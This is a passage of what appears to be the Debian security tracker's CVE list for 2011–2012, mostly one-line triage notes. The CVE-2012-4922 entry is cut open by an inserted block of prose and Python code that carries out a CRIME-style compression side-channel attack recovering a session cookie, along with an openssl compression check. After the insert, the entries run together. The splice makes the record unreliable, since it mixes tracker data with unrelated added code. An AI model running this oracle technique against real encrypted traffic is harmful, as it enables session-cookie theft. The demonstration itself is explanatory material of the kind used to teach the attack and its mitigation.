CVE-2012-5007 (The Fill PDF module 7.x-1.x before 7.x-1.2 for Drupal allows remote ...)
	NOT-FOR-US: Drupal addon Fill PDF
CVE-2012-5006 (Heap-based buffer overflow in npdjvu.dll in Caminova DjVu Browser ...)
	NOT-FOR-US: Caminova DjVu Browser
CVE-2012-5005 (Cross-site request forgery (CSRF) vulnerability in ...)
	NOT-FOR-US: VR GPub
CVE-2012-5004 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	NOT-FOR-US: Parallels H-Sphere
CVE-2012-5003 (nxapplet.jar in No Machine NX Web Companion 3.x and earlier does not ...)
	NOT-FOR-US: No Machine NX Web Companion
CVE-2012-5002 (Stack-based buffer overflow in SR10 FTP server (SR10.exe) 1.1.0.6 in ...)
	NOT-FOR-US: SR10 FTP server in Ricoh DC Software
CVE-2012-5001 (Multiple unspecified vulnerabilities in Hitachi JP1/Cm2/Network Node ...)
	NOT-FOR-US: Hitachi JP1/Cm2/Network Node Manager
CVE-2012-5000 (SQL injection vulnerability in jokes/index.php in the Witze addon 0.9 ...)
	NOT-FOR-US: deV!L'z Clanportal
CVE-2012-4999 (Mercury MR804 Router 8.0 3.8.1 Build 101220 Rel.53006nB allows remote ...)
	NOT-FOR-US: Mercury MR804 Router
CVE-2012-4998 (Cross-site scripting (XSS) vulnerability in index.php in starCMS ...)
	NOT-FOR-US: starCMS
CVE-2012-4997 (Directory traversal vulnerability in acp/index.php in AneCMS allows ...)
	NOT-FOR-US: AneCMS
CVE-2012-4996 (Multiple SQL injection vulnerabilities in RivetTracker 1.03 and ...)
	NOT-FOR-US: RivetTracker
CVE-2012-4995 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: LimeSurvey
CVE-2012-4994 (SQL injection vulnerability in admin/admin.php in LimeSurvey before ...)
	NOT-FOR-US: LimeSurvey
CVE-2012-4993 (torrent_functions.php in RivetTracker 1.03 and earlier does not ...)
	NOT-FOR-US: RivetTracker
CVE-2012-4992 (Multiple buffer overflows in FlashFXP.exe in FlashFXP 4.2 allow remote ...)
	NOT-FOR-US: FlashFXP
CVE-2012-4991 (Multiple directory traversal vulnerabilities in Axway SecureTransport ...)
	NOT-FOR-US: Axway SecureTransport
CVE-2012-4990 (SQL injection vulnerability in admin/campaign-zone-link.php in OpenX ...)
	NOT-FOR-US: OpenX
CVE-2012-4989 (Cross-site scripting (XSS) vulnerability in admin/plugin-index.php in ...)
	NOT-FOR-US: OpenX
CVE-2012-4988 RESERVED
CVE-2012-4987 (Stack-based buffer overflow in RealNetworks RealPlayer 15.0.5.109 ...)
	NOT-FOR-US: RealPlayer
CVE-2012-4986 RESERVED
CVE-2012-4985 (The Forescout CounterACT NAC device 6.3.4.1 does not block ARP and ...)
	NOT-FOR-US: Forescout device
CVE-2012-4984 RESERVED
CVE-2012-4983 (Multiple cross-site scripting (XSS) vulnerabilities on the Forescout ...)
	NOT-FOR-US: Forescout device
CVE-2012-4982 (Open redirect vulnerability in assets/login on the Forescout ...)
	NOT-FOR-US: Forescout device
CVE-2012-4981 RESERVED
CVE-2012-4980 RESERVED
CVE-2012-4979 RESERVED
CVE-2012-4978 RESERVED
CVE-2012-4977 (Layton Helpbox 4.4.0 allows remote attackers to discover cleartext ...)
	NOT-FOR-US: Layton Helpbox
CVE-2012-4976 (selectawasset.asp in Layton Helpbox 4.4.0 allows remote attackers to ...)
	NOT-FOR-US: Layton Helpbox
CVE-2012-4975 (editrequestuser.asp in Layton Helpbox 4.4.0 allows remote ...)
	NOT-FOR-US: Layton Helpbox
CVE-2012-4974 (Layton Helpbox 4.4.0 allows remote authenticated users to change the ...)
	NOT-FOR-US: Layton Helpbox
CVE-2012-4973 RESERVED
CVE-2012-4972 (Multiple cross-site scripting (XSS) vulnerabilities in Layton Helpbox ...)
	NOT-FOR-US: Layton Helpbox
CVE-2012-4971 (Multiple SQL injection vulnerabilities in Layton Helpbox 4.4.0 allow ...)
	NOT-FOR-US: Layton Helpbox
CVE-2012-4970 (Cross-site scripting (XSS) vulnerability in the web management ...)
	NOT-FOR-US: Polycom HDX Video End Points
CVE-2011-5190 (Multiple cross-site scripting (XSS) vulnerabilities in Social Book ...)
	NOT-FOR-US: Social Book Facebook Clone 2010
CVE-2011-5189 (Cross-site scripting (XSS) vulnerability in the Webform Validation ...)
	NOT-FOR-US: Drupal addon
CVE-2011-5187 (Cross-site scripting (XSS) vulnerability in the Support Ticketing ...)
	NOT-FOR-US: Drupal addon
CVE-2011-5186 (Cross-site scripting (XSS) vulnerability in jbshop.php in the jbShop ...)
	NOT-FOR-US: jbShop plugin for e107
CVE-2011-5185 (Cross-site scripting (XSS) vulnerability in video_comments.php in ...)
	NOT-FOR-US: Online Subtitles Workshop
CVE-2011-5184 (Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node ...)
	NOT-FOR-US: HP Network Node Manager
CVE-2011-5182 (** DISPUTED ** ...)
	NOT-FOR-US: Wordpress Lanoba Social plugin, not in Debian
CVE-2011-5181 (Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk ...)
	NOT-FOR-US: Wordpress ClickDesk Live Support - Live Chat plugin, not in Debian
CVE-2011-5180 (Cross-site scripting (XSS) vulnerability in wp-1pluginjquery.php in ...)
	NOT-FOR-US: Wordpress ZooEffect plugin, not in Debian
CVE-2011-5179 (Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php ...)
	NOT-FOR-US: Skysa App Bar
CVE-2011-5177 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: eSyndiCat Pro
CVE-2012-4969 (Use-after-free vulnerability in the CMshtmlEd::Exec function in ...)
	NOT-FOR-US: Internet Explorer
CVE-2012-4968 (Multiple cross-site scripting (XSS) vulnerabilities in SilverStripe ...)
	- silverstripe (bug #528461)
CVE-2012-4967 RESERVED
CVE-2012-4966 RESERVED
CVE-2012-4965 RESERVED
CVE-2012-4964 (The Samsung printer firmware before 20121031 has a hardcoded ...)
	NOT-FOR-US: Samsung printer firmware
CVE-2012-4963 RESERVED
CVE-2012-4962 RESERVED
CVE-2012-4961 RESERVED
CVE-2012-4960 RESERVED
CVE-2012-4959 (Directory traversal vulnerability in NFRAgent.exe in Novell File ...)
	NOT-FOR-US: Novell File Reporter
CVE-2012-4958 (Directory traversal vulnerability in NFRAgent.exe in Novell File ...)
	NOT-FOR-US: Novell File Reporter
CVE-2012-4957 (Absolute path traversal vulnerability in NFRAgent.exe in Novell File ...)
	NOT-FOR-US: Novell File Reporter
CVE-2012-4956 (Heap-based buffer overflow in NFRAgent.exe in Novell File Reporter ...)
	NOT-FOR-US: Novell File Reporter
CVE-2012-4955 (Cross-site scripting (XSS) vulnerability in Dell OpenManage Server ...)
	NOT-FOR-US: Dell OpenManage SA
CVE-2012-4954 (The edit-profile page in Vanilla Forums before 2.1a32 allows remote ...)
	NOT-FOR-US: Vanilla Forums
CVE-2012-4953 (The decomposer engine in Symantec Endpoint Protection (SEP) 11.0, ...)
	NOT-FOR-US: Symantec Endpoint Protection
CVE-2012-4952 (Henry Schein Dentrix G5 before 15.1.294 has a single internal-database ...)
	NOT-FOR-US: Dentrix
CVE-2012-4951 (Multiple SQL injection vulnerabilities in terminal/paramedit.aspx in ...)
	NOT-FOR-US: VeriFone VeriCentre Web Console
CVE-2012-4950 (Cross-site scripting (XSS) vulnerability in the Keyword Search page in ...)
	NOT-FOR-US: Pattern Insight
CVE-2012-4949 (SQL injection vulnerability in ESRI ArcGIS 10.1 allows remote ...)
	NOT-FOR-US: ESRI ArcGIS
CVE-2012-4948 (The default configuration of Fortinet Fortigate UTM appliances uses ...)
	NOT-FOR-US: Fortinet Fortigate UTM appliances
CVE-2012-4947 (Agile FleetCommander and FleetCommander Kiosk before 4.08 store ...)
	NOT-FOR-US: FleetCommander
CVE-2012-4946 (Agile FleetCommander and FleetCommander Kiosk before 4.08 use an XOR ...)
	NOT-FOR-US: FleetCommander
CVE-2012-4945 (Agile FleetCommander and FleetCommander Kiosk before 4.08 allow remote ...)
	NOT-FOR-US: FleetCommander
CVE-2012-4944 (Multiple unrestricted file upload vulnerabilities in Agile ...)
	NOT-FOR-US: FleetCommander
CVE-2012-4943 (Multiple cross-site request forgery (CSRF) vulnerabilities in Agile ...)
	NOT-FOR-US: FleetCommander
CVE-2012-4942 (Multiple cross-site scripting (XSS) vulnerabilities in Agile ...)
	NOT-FOR-US: FleetCommander
CVE-2012-4941 (Multiple SQL injection vulnerabilities in Agile FleetCommander and ...)
	NOT-FOR-US: FleetCommander
CVE-2012-4940 (Multiple directory traversal vulnerabilities in the View Log Files ...)
	NOT-FOR-US: Axigen Free Mail Server
CVE-2012-4939 (Cross-site scripting (XSS) vulnerability in IPAMSummaryView.aspx in ...)
	NOT-FOR-US: SolarWinds Orion Network Performance Monitor
CVE-2012-4938 (Cross-site scripting (XSS) vulnerability in the web interface in ...)
	NOT-FOR-US: Pattern Insight
CVE-2012-4937 (Session fixation vulnerability in the web interface in Pattern Insight ...)
	NOT-FOR-US: Pattern Insight
CVE-2012-4936 (The web interface in Pattern Insight 2.3 allows remote attackers to ...)
	NOT-FOR-US: Pattern Insight
CVE-2012-4935 (Cross-site request forgery (CSRF) vulnerability in the web interface ...)
	NOT-FOR-US: Pattern Insight
CVE-2012-4934 (TomatoCart 1.1.7, when the PayPal Express Checkout module is enabled ...)
	NOT-FOR-US: TomatoCart
CVE-2012-4933 (The rtrlet web application in the Web Console in Novell ZENworks Asset ...)
	NOT-FOR-US: Novell ZENworks
CVE-2012-4932 (Multiple cross-site scripting (XSS) vulnerabilities in SimpleInvoices ...)
	NOT-FOR-US: SimpleInvoices
CVE-2012-4931 RESERVED
CVE-2012-4930 (The SPDY protocol 3 and earlier, as used in Mozilla Firefox, Google ...)
	- iceweasel (Firefox ESR does not support SPDY)
	- chromium-browser 21.0.1180.57~r148591-1
	NOTE: http://www.imperialviolet.org/2012/09/21/crime.html
CVE-2012-4929 (The TLS protocol 1.2 and earlier, as used in Mozilla Firefox, Google ...)
	{DSA-2627-1 DSA-2626-1 DSA-2579-1}
	- iceweasel (Firefox ESR does not use TLS/SSL compression)
	- chromium-browser 22.0.1229.94~r161065-1
	- qt4-x11 4:4.8.2+dfsg-3
	- apache2 2.2.22-12 (bug #689936)
	- lighttpd 1.4.30-1 (bug #700399)
	- nginx 1.2.1-2.2 (bug #700426)
	[squeeze] - qt4-x11 (Minor issue)
	NOTE: Chromium fix: https://chromiumcodereview.appspot.com/10825183/
CVE-2012-4928 (Cross-site scripting (XSS) vulnerability in ow_updates/index.php in ...)
	NOT-FOR-US: Oxwall 1.1.1
CVE-2012-4927 (SQL injection vulnerability in Limesurvey (a.k.a PHPSurveyor) before ...)
	NOT-FOR-US: Limesurvey
CVE-2012-4926 (approve.php in Img Pals Photo Host 1.0 does not authenticate requests, ...)
	NOT-FOR-US: Img Pals Photo Host 1.0
CVE-2012-4925 (Multiple SQL injection vulnerabilities in approve.php in Img Pals ...)
	NOT-FOR-US: Img Pals Photo Host 1.0
CVE-2012-4924 (Buffer overflow in the CxDbgPrint function in the ipswcom.dll ActiveX ...)
	NOT-FOR-US: ASUS Net4Switch
CVE-2012-4923 (Multiple cross-site scripting (XSS) vulnerabilities in Endian Firewall ...)
	NOT-FOR-US: Endian Firewall 2.4
CVE-2012-4922 (The tor_timegm function in common/util.c in Tor before 0.2.2.39, and ...)
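The two CRIME entries above (CVE-2012-4930 for SPDY, CVE-2012-4929 for TLS compression) only record which packages were fixed, and the fix in every case was to stop compressing. The following is an added example, not code from the Debian tracker, Chromium or any package listed there; it reduces the attack to an offline zlib oracle so the mechanism the fixes remove can be seen: a secret cookie and an attacker-chosen URL path share one compression context, so a guess that matches the start of the secret is absorbed into an LZ77 back-reference and the output shrinks. The request layout, the example.com host and the session id are constructed for the demo. Two simplifications are assumptions of this example, not properties of the real attack: deflate's fixed Huffman table (zlib's Z_FIXED strategy) is forced so that only matching decides the size, whereas TLS/SPDY use dynamic tables and CRIME tooling has to average repeated measurements, and the pad bytes used to shift bit alignment are values above 0x7f that no real URL would carry.

```python
"""CRIME-style compression side channel, reduced to an offline zlib oracle.

Added example for the CVE-2012-4929 / CVE-2012-4930 entries; not code from
the Debian security tracker or from any package listed there.
"""
import zlib

# Constructed sample data (hypothetical): a victim request whose Cookie
# header carries the secret, and a request path the attacker controls
# (a cross-site request lets an attacker pick the path but not the cookie).
SECRET_COOKIE = b"sessionid=7f3a9c1e2b"     # constructed, not a real session id
KNOWN_PREFIX = b"sessionid="                # attacker knows the cookie name
ALPHABET = b"0123456789abcdef\r"            # hex digits; CR marks end of value


def build_request(attacker_path: bytes, cookie: bytes) -> bytes:
    """Victim's request as the browser sends it: attacker-chosen path and
    secret cookie inside the same compression context."""
    return (b"GET /" + attacker_path + b" HTTP/1.1\r\n"
            b"Host: example.com\r\n"
            b"Cookie: " + cookie + b"\r\n\r\n")


def compressed_size(data: bytes) -> int:
    """The oracle: the on-the-wire size an attacker can observe.

    Z_FIXED selects deflate's fixed Huffman table so that only LZ77 matching
    decides the size; TLS/SPDY deflate uses dynamic tables, which add noise
    that CRIME tooling averages out with repeated measurements."""
    c = zlib.compressobj(9, zlib.DEFLATED, 15, 8, zlib.Z_FIXED)
    return len(c.compress(data) + c.flush())


def guess_cost(known: bytes, candidate: int, pad_len: int, cookie: bytes) -> int:
    """Size of the request when the path repeats `known` plus one guessed byte.

    A correct guess extends the LZ77 match against the cookie by one byte and
    saves 7 or 8 bits; that shows up as a whole byte only at some bit
    alignments, so the caller sweeps pad_len.  The pad bytes are distinct
    values >= 0x80, which the fixed table encodes as 9-bit literals, shifting
    the alignment by one bit per pad byte (assumption of this demo: no real
    URL carries such bytes)."""
    pad = bytes(range(0x80, 0x80 + pad_len))
    path = pad + known + bytes([candidate])
    return compressed_size(build_request(path, cookie))


def recover_secret(cookie: bytes, prefix: bytes = KNOWN_PREFIX,
                   alphabet: bytes = ALPHABET, max_len: int = 64) -> bytes:
    """Recover the cookie value byte by byte from compressed sizes alone."""
    recovered = b""
    for _ in range(max_len):
        known = prefix + recovered
        # Sum over all 8 alignments: the right byte wins by 7 or 8 in total,
        # so ties between candidates at a single alignment do not matter.
        scores = {c: sum(guess_cost(known, c, pad_len, cookie)
                         for pad_len in range(8))
                  for c in alphabet}
        best = min(scores, key=scores.get)
        if best == ord("\r"):          # end of the cookie value reached
            break
        recovered += bytes([best])
    return recovered


def oracle_is_blind(cookie: bytes) -> bool:
    """With compression disabled (the mitigation for CVE-2012-4929 in the
    server packages listed above), the observable size is the same for
    every guess and the side channel is gone."""
    sizes = {len(build_request(KNOWN_PREFIX + bytes([c]), cookie))
             for c in ALPHABET}
    return len(sizes) == 1


if __name__ == "__main__":
    print(recover_secret(SECRET_COOKIE))    # b'7f3a9c1e2b'
    print(oracle_is_blind(SECRET_COOKIE))   # True
```

Each recovered byte costs 17 candidates times 8 alignments, i.e. 136 observed requests, which is the order of magnitude the original CRIME demonstration needed per cookie character. To check a deployed server rather than this model, `openssl s_client -connect host:443 -comp` (the `-comp` switch exists from OpenSSL 1.1.0, where compression is off by default on the client side) prints the negotiated method in its SSL-Session summary; anything other than `Compression: NONE` means the server still offers the oracle.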
	{DSA-2548-1}
	- tor 0.2.3.22-rc-1
CVE-2012-4921 RESERVED
CVE-2012-4920 RESERVED
CVE-2012-4919 RESERVED
CVE-2012-4918 (Call of Duty Elite for iOS 2.0.1 does not properly validate the server ...)
	NOT-FOR-US: Call of Duty Elite for iOS
CVE-2012-4917 (The TripAdvisor app 6.6 for iOS sends cleartext credentials, which ...)
	NOT-FOR-US: The TripAdvisor app 6.6 for iOS
CVE-2012-4916 RESERVED
CVE-2012-4915 RESERVED
CVE-2012-4914 (Stack-based buffer overflow in the reader in CoolPDF 3.0.2.256 allows ...)
	NOT-FOR-US: CoolPDF
CVE-2012-4913 RESERVED
CVE-2012-4912 (Cross-site scripting (XSS) vulnerability in the WebAccess component in ...)
	NOT-FOR-US: Novell GroupWise
CVE-2011-5188 (Cross-site scripting (XSS) vulnerability in the Support Timer module ...)
	NOT-FOR-US: Drupal module
CVE-2011-5183 (Multiple SQL injection vulnerabilities in OrderSys 1.6.4 and earlier ...)
	NOT-FOR-US: OrderSys
CVE-2011-5178 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Infoblox NetMRI
CVE-2011-5176 (Multiple cross-site scripting (XSS) vulnerabilities in search.php in ...)
	NOT-FOR-US: Banana Dance
CVE-2011-5175 (SQL injection vulnerability in search.php in Banana Dance, possibly ...)
	NOT-FOR-US: Banana Dance
CVE-2011-5174 (Buffer overflow in Intel Trusted Execution Technology (TXT) SINIT ...)
	NOT-FOR-US: Intel Trusted Execution Technology
CVE-2011-5173 (Buffer overflow in Bugbear Entertainment FlatOut 2005 allows ...)
	NOT-FOR-US: Bugbear Entertainment FlatOut 2005
CVE-2011-5172 (Stack-based buffer overflow in StoryBoard Quick 6 Build 3786, and ...)
	NOT-FOR-US: StoryBoard Quick 6 Build, StoryBoard Artist and StoryBoard Studio
CVE-2011-5171 (Multiple stack-based buffer overflows in CyberLink Power2Go 7 (build ...)
	NOT-FOR-US: CyberLink Power2Go
CVE-2011-5170 (Stack-based buffer overflow in Castillo Bueno Systems CCMPlayer 1.5 ...)
	NOT-FOR-US: Castillo Bueno Systems CCMPlayer
CVE-2011-5169 (SQL injection vulnerability in ...)
	NOT-FOR-US: SonicWall ViewPoint
CVE-2011-5168 (SQL injection vulnerability in user.php in Banana Dance before B.1.5 ...)
	NOT-FOR-US: Banana Dance
CVE-2011-5167 (Heap-based buffer overflow in the SetDevNames method of the Tidestone ...)
	NOT-FOR-US: Oracle Hyperion Strategic Finance
CVE-2011-5166 (Multiple stack-based buffer overflows in KnFTP 1.0.0 allow remote ...)
	NOT-FOR-US: KnFTP
CVE-2011-5165 (Stack-based buffer overflow in Free MP3 CD Ripper 1.1, 2.6 and ...)
	NOT-FOR-US: Free MP3 CD Ripper
CVE-2011-5164 (Stack-based buffer overflow in VanDyke Software AbsoluteFTP 1.9.6 ...)
	NOT-FOR-US: VanDyke Software AbsoluteFTP
CVE-2011-5163 (Buffer overflow in an unspecified third-party component in the Batch ...)
	NOT-FOR-US: Schneider Electric CitectSCADA
CVE-2011-5162 (Stack-based buffer overflow in GOM Player 2.1.33.5071 allows ...)
	NOT-FOR-US: GOM Player
CVE-2012-4911 RESERVED
CVE-2012-4910 RESERVED
CVE-2012-4909 (Google Chrome before 18.0.1025308 on Android allows remote attackers ...)
	- chromium-browser (Chrome on Android)
CVE-2012-4908 (Google Chrome before 18.0.1025308 on Android allows remote attackers ...)
	- chromium-browser (Chrome on Android)
CVE-2012-4907 (Google Chrome before 18.0.1025308 on Android does not properly ...)
	- chromium-browser (Chrome on Android)
CVE-2012-4906 (Google Chrome before 18.0.1025308 on Android does not properly ...)
	- chromium-browser (Chrome on Android)
CVE-2012-4905 (Cross-site scripting (XSS) vulnerability in Google Chrome before ...)
	- chromium-browser (Chrome on Android)
CVE-2012-4904 (Cross-application scripting vulnerability in Google Chrome before ...)
	- chromium-browser (Chrome on Android)
CVE-2012-4903 (Google Chrome before 18.0.1025308 on Android does not properly ...)
	- chromium-browser (Chrome on Android)
CVE-2012-4902 RESERVED
CVE-2012-4901 RESERVED
CVE-2012-4900 RESERVED
CVE-2012-4899 (WellinTech KingView 6.5.3 and earlier uses a weak password-hashing ...)
NOT-FOR-US: WellinTech KingView CVE-2012-4898 (Mesh OS before 7.9.1.1 on Tropos wireless mesh routers does not use a ...) NOT-FOR-US: Mesh OS CVE-2012-4897 (Untrusted search path vulnerability in the installer in VMware Movie ...) NOT-FOR-US: VMware CVE-2012-4896 (Heap-based buffer overflow in SumatraPDF before 2.1 allows remote ...) NOT-FOR-US: SumatraPDF CVE-2012-4895 (Heap-based buffer overflow in SumatraPDF before 2.1 allows remote ...) NOT-FOR-US: SumatraPDF CVE-2012-4894 (Google SketchUp before 8.0.14346 (aka 8 Maintenance 3) allows ...) NOT-FOR-US: Google SketchUp CVE-2012-4893 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: Webmin CVE-2012-4892 (Multiple cross-site scripting (XSS) vulnerabilities in FlatnuX CMS ...) NOT-FOR-US: FlatnuX CMS CVE-2012-4891 (Cross-site scripting (XSS) vulnerability in fw/index2.do in ...) NOT-FOR-US: ManageEngine Firewall Analyzer CVE-2012-4890 (Multiple cross-site scripting (XSS) vulnerabilities in FlatnuX CMS ...) NOT-FOR-US: FlatnuX CMS CVE-2012-4889 (Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ...) NOT-FOR-US: ManageEngine Firewall Analyzer CVE-2012-4888 RESERVED CVE-2012-4887 RESERVED CVE-2012-4886 RESERVED CVE-2012-4885 (The wikitext parser in MediaWiki 1.17.x before 1.17.3 and 1.18.x ...) - mediawiki 1:1.19.0-1 (low) CVE-2012-4884 (Argument injection vulnerability in Request Tracker (RT) 3.8.x before ...) {DSA-2567-1} - request-tracker3.8 - request-tracker4 4.0.7-2 CVE-2011-5161 (Unrestricted file upload vulnerability in the patient photograph ...) NOT-FOR-US: OpenEMR CVE-2011-5160 (Cross-site scripting (XSS) vulnerability in setup.php in OpenEMR 4 ...) NOT-FOR-US: OpenEMR CVE-2011-5159 (Cross-site scripting (XSS) vulnerability in admin/configuration.php in ...) NOT-FOR-US: Geeklog CVE-2012-4883 (Multiple untrusted search path vulnerabilities in 3DVIA Composer ...) 
NOT-FOR-US: 3DVIA Composer V6R2012 CVE-2012-4882 (Multiple untrusted search path vulnerabilities in 3D XML Player ...) NOT-FOR-US: 3D XML Player CVE-2012-4881 (Untrusted search path vulnerability in moviEZ HD 1.0 Build ...) NOT-FOR-US: moviEZ CVE-2012-4880 (Multiple untrusted search path vulnerabilities in DVD Architect Pro ...) NOT-FOR-US: DVD Architect Pro CVE-2012-4879 (The Linux Console on the WAGO I/O System 758 model 758-870, 758-874, ...) NOT-FOR-US: WAGO I/O System 758 CVE-2012-4878 (Absolute path traversal vulnerability in controlcenter.php in FlatnuX ...) NOT-FOR-US: FlatnuX CMS CVE-2012-4877 (Cross-site request forgery (CSRF) vulnerability in controlcenter.php ...) NOT-FOR-US: FlatnuX CMS CVE-2012-4876 (Stack-based buffer overflow in the UltraMJCam ActiveX Control in ...) NOT-FOR-US: TRENDnet SecurView TV-IP121WN Wireless Internet Camera CVE-2012-4875 (** DISPUTED ** ...) - ghostscript (Even if it's genuine, it's Windows-code) CVE-2012-4874 (Unspecified vulnerability in the Another WordPress Classifieds Plugin ...) NOT-FOR-US: Another WordPress Classifieds Plugin for Wordpress CVE-2012-4873 (Cross-site scripting (XSS) vulnerability in the file_download function ...) NOT-FOR-US: GNUBoard CVE-2012-4872 (Cross-site scripting (XSS) vulnerability in Tickets/Submit in Kayako ...) NOT-FOR-US: Kayako Fusion CVE-2012-4871 (Cross-site scripting (XSS) vulnerability in service/graph_html.php in ...) NOT-FOR-US: LiteSpeed Web Server CVE-2012-4870 (Multiple cross-site scripting (XSS) vulnerabilities in FreePBX 2.9 and ...) - freepbx (bug #464926) CVE-2012-4869 (The callme_startcall function in recordings/misc/callme_page.php in ...) - freepbx (bug #464926) CVE-2012-4868 (SQL injection vulnerability in news.php in the Kunena component 1.7.2 ...) NOT-FOR-US: Kunena component for Joomla! CVE-2012-4867 (Directory traversal vulnerability in ...) NOT-FOR-US: vtiger CRM CVE-2012-4866 (Untrusted search path vulnerability in Xtreme RAT 3.5 allows local ...) 
NOT-FOR-US: Xtreme RAT CVE-2012-4865 (Buffer overflow in Oreans Themida 2.1.8.0 allows remote attackers to ...) NOT-FOR-US: Oreans Themida CVE-2012-4864 (Oreans WinLicense 2.1.8.0 allows remote attackers to cause a denial of ...) NOT-FOR-US: Oreans WinLicense CVE-2012-4863 RESERVED CVE-2012-4862 (The Host Connect emulator in IBM Rational Developer for System z 7.1 ...) NOT-FOR-US: IBM Rational CVE-2012-4861 (The web server in InfoSphere Data Replication Dashboard in IBM ...) NOT-FOR-US: IBM InfoSphere CVE-2012-4860 RESERVED CVE-2012-4859 (Unspecified vulnerability in IBM Tivoli Storage Manager for Space ...) NOT-FOR-US: IBM Tivoli Storage Manager CVE-2012-4858 (IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4857 (Buffer overflow in IBM Informix 11.50 through 11.50.xC9W2 and 11.70 ...) NOT-FOR-US: IBM Informix CVE-2012-4856 (The Service Processor in the IBM Power 5 91##-### and 940#-### before ...) NOT-FOR-US: IBM Power 5 CVE-2012-4855 (Unspecified vulnerability in the web services framework in IBM ...) NOT-FOR-US: IBM WebSphere Commerce CVE-2012-4854 RESERVED CVE-2012-4853 (Cross-site request forgery (CSRF) vulnerability in IBM WebSphere ...) NOT-FOR-US: Websphere CVE-2012-4852 RESERVED CVE-2012-4851 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Application ...) NOT-FOR-US: Websphere CVE-2012-4850 (IBM WebSphere Application Server 8.5 Liberty Profile before 8.5.0.1, ...) NOT-FOR-US: Websphere CVE-2012-4849 RESERVED CVE-2012-4848 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus ...) NOT-FOR-US: IBM Lotus Foundations Start CVE-2012-4847 (IBM Cognos Business Intelligence (BI) 8.4 and 8.4.1 allows remote ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4846 (IBM Lotus Notes 8.5.x before 8.5.3 FP3 does not include the HTTPOnly ...) NOT-FOR-US: IBM Lotus Notes CVE-2012-4845 (The FTP client in AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does ...) 
NOT-FOR-US: AIX CVE-2012-4844 (Cross-site scripting (XSS) vulnerability in the web server in IBM ...) NOT-FOR-US: IBM Lotus Domino CVE-2012-4843 RESERVED CVE-2012-4842 (Open redirect vulnerability in the web server in IBM Lotus Domino ...) NOT-FOR-US: IBM Lotus Domino CVE-2012-4841 (Unspecified vulnerability in Tivoli Endpoint Manager for Remote ...) NOT-FOR-US: Tivoli CVE-2012-4840 (IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4839 (The OSLC interface in the Web Client (aka CQ Web) in IBM Rational ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2012-4838 (IBM Flex System Chassis Management Module (CMM) and Integrated ...) NOT-FOR-US: IBM Flex CVE-2012-4837 (IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4836 (Cross-site scripting (XSS) vulnerability in IBM Cognos Business ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4835 (Cross-site scripting (XSS) vulnerability in IBM Cognos Business ...) NOT-FOR-US: IBM Cognos Business Intelligence CVE-2012-4834 (Directory traversal vulnerability in LayerLoader.jsp in the theme ...) NOT-FOR-US: IBM WebSphere Portal CVE-2012-4833 (fuser in IBM AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does not ...) NOT-FOR-US: AIX CVE-2012-4832 (Information Services Framework (ISF) in IBM InfoSphere Information ...) NOT-FOR-US: IBM InfoSphere CVE-2012-4831 RESERVED CVE-2012-4830 (Unspecified vulnerability in IBM WebSphere Commerce 6.0 through ...) NOT-FOR-US: WebSphere CVE-2012-4829 (IBM XIV Storage System Gen3 before 11.2 relies on a default X.509 v3 ...) NOT-FOR-US: IBM CVE-2012-4828 RESERVED CVE-2012-4827 RESERVED CVE-2012-4826 (Stack-based buffer overflow in the SQL/PSM (aka SQL Persistent Stored ...) NOT-FOR-US: IBM DB2 CVE-2012-4825 (Multiple cross-site scripting (XSS) vulnerabilities in ...) 
NOT-FOR-US: Lotus Notes CVE-2012-4824 (Open redirect vulnerability in servlet/traveler in IBM Lotus Notes ...) NOT-FOR-US: Lotus Notes CVE-2012-4823 (Unspecified vulnerability in the JRE component in IBM Java 7 SR2 and ...) - openjdk-6 (Vulnerabilities specific to IBM Java) - openjdk-7 (Vulnerabilities specific to IBM Java) CVE-2012-4822 (Multiple unspecified vulnerabilities in the JRE component in IBM Java ...) - openjdk-6 (Vulnerabilities specific to IBM Java) - openjdk-7 (Vulnerabilities specific to IBM Java) CVE-2012-4821 (Multiple unspecified vulnerabilities in the JRE component in IBM Java ...) - openjdk-6 (Vulnerabilities specific to IBM Java) - openjdk-7 (Vulnerabilities specific to IBM Java) CVE-2012-4820 (Unspecified vulnerability in the JRE component in IBM Java 7 SR2 and ...) - openjdk-6 (Vulnerabilities specific to IBM Java) - openjdk-7 (Vulnerabilities specific to IBM Java) CVE-2012-4819 (Cross-site scripting (XSS) vulnerability in InfoSphere Business ...) NOT-FOR-US: IBM InfoSphere CVE-2012-4818 RESERVED CVE-2012-4817 (The NFSv4 client implementation in IBM AIX 5.3, 6.1, and 7.1, and VIOS ...) NOT-FOR-US: IBM AIX, VIOS CVE-2012-4816 (IBM Rational Automation Framework (RAF) 3.x through 3.0.0.5 allows ...) NOT-FOR-US: IBM Rational Automation Framework CVE-2012-4815 RESERVED CVE-2012-4814 RESERVED CVE-2012-4813 RESERVED CVE-2012-4812 RESERVED CVE-2012-4811 RESERVED CVE-2012-4810 RESERVED CVE-2012-4809 RESERVED CVE-2012-4808 RESERVED CVE-2012-4807 RESERVED CVE-2012-4806 RESERVED CVE-2012-4805 RESERVED CVE-2012-4804 RESERVED CVE-2012-4803 RESERVED CVE-2012-4802 RESERVED CVE-2012-4801 RESERVED CVE-2012-4800 RESERVED CVE-2012-4799 RESERVED CVE-2012-4798 RESERVED CVE-2012-4797 RESERVED CVE-2012-4796 RESERVED 